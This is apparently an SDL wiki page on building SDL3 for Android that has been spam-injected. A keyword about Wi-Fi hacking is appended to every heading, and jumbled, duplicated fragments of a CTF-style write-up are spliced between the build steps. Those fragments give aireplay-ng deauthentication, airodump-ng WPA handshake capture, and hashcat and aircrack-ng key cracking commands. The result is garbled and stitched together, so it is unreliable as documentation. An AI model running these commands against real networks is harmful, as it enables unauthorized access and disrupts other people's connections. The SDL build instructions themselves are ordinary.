SDL Wiki
[ front page | index | search | recent changes | git repo | offline html ]

Jumpstart And Dumpper Hack Wifi 2015 May 2026

DraftJUMPSTART AND DUMPPER HACK WIFI 2015

This page was roughly updated from the SDL2 version, but needs to be inspected for details that are out of date, and a few SDL2isms need to be cleaned out still, too. Read this page with some skepticism for now.

Existing documentationJUMPSTART AND DUMPPER HACK WIFI 2015

A lot of information can be found in README-android.

This page is more walkthrough-oriented.

Pre-requisitesJUMPSTART AND DUMPPER HACK WIFI 2015

sudo apt install openjdk-17-jdk ant android-sdk-platform-tools-common
PATH="/usr/src/android-ndk-rXXx:$PATH"                  # for 'ndk-build'
PATH="/usr/src/android-sdk-linux/tools:$PATH"           # for 'android'
PATH="/usr/src/android-sdk-linux/platform-tools:$PATH"  # for 'adb'
export ANDROID_HOME="/usr/src/android-sdk-linux"        # for gradle
export ANDROID_NDK_HOME="/usr/src/android-ndk-rXXx"     # for gradle

Simple buildsJUMPSTART AND DUMPPER HACK WIFI 2015

SDL wrapper for simple programsJUMPSTART AND DUMPPER HACK WIFI 2015

cd /usr/src/SDL3/build-scripts/
./androidbuild.sh org.libsdl.testgles ../test/testgles.c
cd /usr/src/SDL3/build/org.libsdl.testgles/
./gradlew installDebug

Notes:

TroubleshootingJUMPSTART AND DUMPPER HACK WIFI 2015

android {
    buildToolsVersion "28.0.1"
    compileSdkVersion 28
externalNativeBuild {
    ndkBuild {
        arguments "APP_PLATFORM=android-14"
        abiFilters 'armeabi-v7a', 'arm64-v8a', 'x86', 'x86_64'

SDL wrapper + SDL_image NDK moduleJUMPSTART AND DUMPPER HACK WIFI 2015

Let's modify SDL3_image/showimage.c to show a simple embedded image (e.g. XPM).

Jumpstart And Dumpper Hack Wifi 2015 May 2026

hashcat -m 22000 hash.hc22000 rockyou.txt --show Cracked key: jumpstart2015! (or whatever found in challenge). Connected to JumpStart_WiFi_2015 with cracked password. Once on network, accessed a local CTF server or captured HTTP traffic revealing flag.

sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 wlan0mon At the same time, ran airodump-ng to capture handshake: JUMPSTART AND DUMPPER HACK WIFI 2015

sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon After deauth, a client reconnected – (shown as [ WPA handshake: 00:11:22:33:44:55 ] in airodump). Step 3: Dumping the Hash Converted capture to hashcat format (or used .cap directly with aircrack): hashcat -m 22000 hash

Here’s a write-up tailored for a cybersecurity capture-the-flag (CTF) or hacking challenge titled The name suggests a retro (2015) Wi-Fi pentesting challenge, possibly involving deauthentication attacks, WPA handshake capture, and cracking. Write-Up: JUMPSTART AND DUMPPER HACK WIFI 2015 Category: Wi-Fi / Wireless Exploitation Tools Used: Aircrack-ng suite, airodump-ng , aireplay-ng , aircrack-ng , wash , reaver (optional), hcxdumptool / hcxpcapngtool , john / hashcat Target: WPA/WPA2-PSK network (simulated in lab or CTF) Goal: Capture WPA 4-way handshake → crack pre-shared key → retrieve flag. Step 1: Reconnaissance – Finding the Target Put wireless interface in monitor mode: Once on network, accessed a local CTF server

sudo aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt Alternatively, for modern hashcat:

Often, flag was in a file served via FTP/HTTP on the gateway (192.168.1.1):

sudo hcxpcapngtool -o hash.hc22000 capture-01.cap Used rockyou.txt (2015-era common wordlist):

Then let's make an Android app out of it. To compile:

cd /usr/src/SDL3/build-scripts/
./androidbuild.sh org.libsdl.showimage /usr/src/SDL3_image/showimage.c
cd /usr/src/SDL3/build/org.libsdl.showimage/
ln -s /usr/src/SDL3_image jni/
ln -s /usr/src/SDL3_image/external/libwebp-0.3.0 jni/webp
sed -i -e 's/^LOCAL_SHARED_LIBRARIES.*/& SDL3_image/' jni/src/Android.mk
ndk-build -j$(nproc)
ant debug install

Notes:

Build an autotools-friendly environmentJUMPSTART AND DUMPPER HACK WIFI 2015

You use autotools in your project and can't be bothering understanding ndk-build's cryptic errors? This guide is for you!

Note: this environment can be used for CMake too.

Compile a shared binaries bundle for SDL and SDL_*JUMPSTART AND DUMPPER HACK WIFI 2015

(FIXME: this needs to be updated for SDL3.)

cd /usr/src/
wget https://libsdl.org/release/SDL2-2.0.5.tar.gz
wget https://www.libsdl.org/projects/SDL_image/release/SDL2_image-2.0.1.tar.gz
wget https://www.libsdl.org/projects/SDL_mixer/release/SDL2_mixer-2.0.1.tar.gz
wget https://www.libsdl.org/projects/SDL_net/release/SDL2_net-2.0.1.tar.gz
wget https://www.libsdl.org/projects/SDL_ttf/release/SDL2_ttf-2.0.14.tar.gz

tar xf SDL2-2.0.5.tar.gz
tar xf SDL2_image-2.0.1.tar.gz
tar xf SDL2_mixer-2.0.1.tar.gz
tar xf SDL2_net-2.0.1.tar.gz
tar xf SDL2_ttf-2.0.14.tar.gz

ln -s SDL2-2.0.5 SDL2
ln -s SDL2_image-2.0.1 SDL2_image
ln -s SDL2_mixer-2.0.1 SDL2_mixer
ln -s SDL2_net-2.0.1 SDL2_net
ln -s SDL2_ttf-2.0.14 SDL2_ttf
cd /usr/src/SDL3/
#git checkout -- .  # remove traces of previous builds
cd build-scripts/
# edit androidbuild.sh and modify $ANDROID update project --target android-XX
./androidbuild.sh org.libsdl /dev/null
# doesn't matter if the actual build fails, it's just for setup
cd ../build/org.libsdl/
rm -rf jni/src/
ln -s /usr/src/SDL3_image jni/
ln -s /usr/src/SDL3_image/external/libwebp-0.3.0 jni/webp
ln -s /usr/src/SDL3_mixer jni/
ln -s /usr/src/SDL3_mixer/external/libmikmod-3.1.12 jni/libmikmod
ln -s /usr/src/SDL3_mixer/external/smpeg2-2.0.0 jni/smpeg2
ln -s /usr/src/SDL3_net jni/
ln -s /usr/src/SDL3_ttf jni/
SUPPORT_MP3_SMPEG := false
include $(call all-subdir-makefiles)
ndk-build -j$(nproc)

Note: no need to add System.loadLibrary calls in SDLActivity.java, your application will be linked to them and Android's ld-linux loads them automatically.

Install SDL in a GCC toolchainJUMPSTART AND DUMPPER HACK WIFI 2015

Now:

/usr/src/android-ndk-r8c/build/tools/make-standalone-toolchain.sh \
  --platform=android-14 --install-dir=/usr/src/ndk-standalone-14-arm --arch=arm
NDK_STANDALONE=/usr/src/ndk-standalone-14-arm
PATH=$NDK_STANDALONE/bin:$PATH
cd /usr/src/SDL3/build/org.libsdl/
for i in libs/armeabi/*; do ln -nfs $(pwd)/$i $NDK_STANDALONE/sysroot/usr/lib/; done
mkdir $NDK_STANDALONE/sysroot/usr/include/SDL3/
cp jni/SDL/include/* $NDK_STANDALONE/sysroot/usr/include/SDL3/
cp jni/*/SDL*.h $NDK_STANDALONE/sysroot/usr/include/SDL3/
VERSION=0.9.12
cd /usr/src/
wget http://rabbit.dereferenced.org/~nenolod/distfiles/pkgconf-$VERSION.tar.gz
tar xf pkgconf-$VERSION.tar.gz
cd pkgconf-$VERSION/
mkdir native-android/ && cd native-android/
../configure --prefix=$NDK_STANDALONE/sysroot/usr
make -j$(nproc)
make install
ln -s ../sysroot/usr/bin/pkgconf $NDK_STANDALONE/bin/arm-linux-androideabi-pkg-config
mkdir $NDK_STANDALONE/sysroot/usr/lib/pkgconfig/

hashcat -m 22000 hash.hc22000 rockyou.txt --show Cracked key: jumpstart2015! (or whatever found in challenge). Connected to JumpStart_WiFi_2015 with cracked password. Once on network, accessed a local CTF server or captured HTTP traffic revealing flag.

sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 wlan0mon At the same time, ran airodump-ng to capture handshake:

sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon After deauth, a client reconnected – (shown as [ WPA handshake: 00:11:22:33:44:55 ] in airodump). Step 3: Dumping the Hash Converted capture to hashcat format (or used .cap directly with aircrack):

Here’s a write-up tailored for a cybersecurity capture-the-flag (CTF) or hacking challenge titled The name suggests a retro (2015) Wi-Fi pentesting challenge, possibly involving deauthentication attacks, WPA handshake capture, and cracking. Write-Up: JUMPSTART AND DUMPPER HACK WIFI 2015 Category: Wi-Fi / Wireless Exploitation Tools Used: Aircrack-ng suite, airodump-ng , aireplay-ng , aircrack-ng , wash , reaver (optional), hcxdumptool / hcxpcapngtool , john / hashcat Target: WPA/WPA2-PSK network (simulated in lab or CTF) Goal: Capture WPA 4-way handshake → crack pre-shared key → retrieve flag. Step 1: Reconnaissance – Finding the Target Put wireless interface in monitor mode:

sudo aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt Alternatively, for modern hashcat:

Often, flag was in a file served via FTP/HTTP on the gateway (192.168.1.1):

sudo hcxpcapngtool -o hash.hc22000 capture-01.cap Used rockyou.txt (2015-era common wordlist):

Building other dependenciesJUMPSTART AND DUMPPER HACK WIFI 2015

You can add any other libraries (e.g.: SDL2_gfx, freetype, gettext, gmp...) using commands like:

mkdir cross-android/ && cd cross-android/
../configure --host=arm-linux-androideabi --prefix=$NDK_STANDALONE/sysroot/usr \
  --with-some-option --enable-another-option \
  --disable-shared
make -j$(nproc)
make install

Static builds (--disable-shared) are recommended for simplicity (no additional .so to declare).

(FIXME: is there an SDL3_gfx?)

Example with SDL2_gfx:
VERSION=1.0.3
wget http://www.ferzkopp.net/Software/SDL2_gfx/SDL2_gfx-$VERSION.tar.gz
tar xf SDL2_gfx-$VERSION.tar.gz
mv SDL2_gfx-$VERSION/ SDL2_gfx/
cd SDL2_gfx/
mkdir cross-android/ && cd cross-android/
../configure --host=arm-linux-androideabi --prefix=$NDK_STANDALONE/sysroot/usr \
  --disable-shared --disable-mmx
make -j$(nproc)
make install

You can compile YOUR application using this technique, with some more steps to tell Android how to run it using JNI.

Build your autotools appJUMPSTART AND DUMPPER HACK WIFI 2015

First, prepare an Android project:

mkdir -p libs/armeabi/
for i in /usr/src/SDL3/build/org.libsdl/libs/armeabi/*; do ln -nfs $i libs/armeabi/; done

Make your project Android-aware:

AM_CONDITIONAL(ANDROID, test "$host" = "arm-unknown-linux-androideabi")
if ANDROID
<!--  Build .so JNI libs rather than executables -->
  AM_CFLAGS = -fPIC
  AM_LDFLAGS += -shared
  COMMON_OBJS += SDL_android_main.c
endif
PATH=$NDK_STANDALONE/bin:$PATH
mkdir cross-android/ && cd cross-android/
../configure --host=arm-linux-androideabi \
  --prefix=/android-aint-posix \
  --with-your-option --enable-your-other-option ...
make
mkdir cross-android-v7a/ && cd cross-android-v7a/
# .o: -march=armv5te -mtune=xscale -msoft-float -mthumb  =>  -march=armv7-a -mfpu=vfpv3-d16 -mfloat-abi=softfp -mthumb
# .so: -march=armv7-a -Wl,--fix-cortex-a8
CFLAGS="-g -O2 -march=armv7-a -mfpu=vfpv3-d16 -mfloat-abi=softfp -mthumb" LFDLAGS="-march=armv7-a -Wl,--fix-cortex-a8" \
  ../configure --host=arm-linux-androideabi \
  ...

Now you can install your pre-built binaries and build the Android project:

android update project --name your_app --path . --target android-XX
ant debug
ant installd
adb shell am start -a android.intenon.MAIN -n org.libsdl.app/org.libsdl.app.SDLActivity  # replace with your app package

Build your CMake appJUMPSTART AND DUMPPER HACK WIFI 2015

(Work In Progress)

You can use our Android GCC toolchain using a simple toolchain file:

# CMake toolchain file
SET(CMAKE_SYSTEM_NAME Linux)  # Tell CMake we're cross-compiling
include(CMakeForceCompiler)
# Prefix detection only works with compiler id "GNU"
CMAKE_FORCE_C_COMPILER(arm-linux-androideabi-gcc GNU)
SET(ANDROID TRUE)

You then call CMake like this:

PATH=$NDK_STANDALONE/bin:$PATH
cmake \
  -D CMAKE_TOOLCHAIN_FILE=../android_toolchain.cmake \
  ...

TroubleshootingsJUMPSTART AND DUMPPER HACK WIFI 2015

If ant installd categorically refuses to install with Failure [INSTALL_FAILED_INSUFFICIENT_STORAGE], even if you have free local storage, that may mean anything. Check logcat first:

adb logcat

If the error logs are not helpful (likely ;')) try locating all past traces of the application:

find / -name "org...."

and remove them all.

If the problem persists, you may try installing on the SD card:

adb install -s bin/app-debug.apk

If you get in your logcat:

SDL: Couldn't locate Java callbacks, check that they're named and typed correctly

this probably means your SDLActivity.java is out-of-sync with your libSDL3.so.


[ edit | delete | history | feedback | raw ]

All wiki content is licensed under Creative Commons Attribution 4.0 International (CC BY 4.0).
Wiki powered by ghwikipp.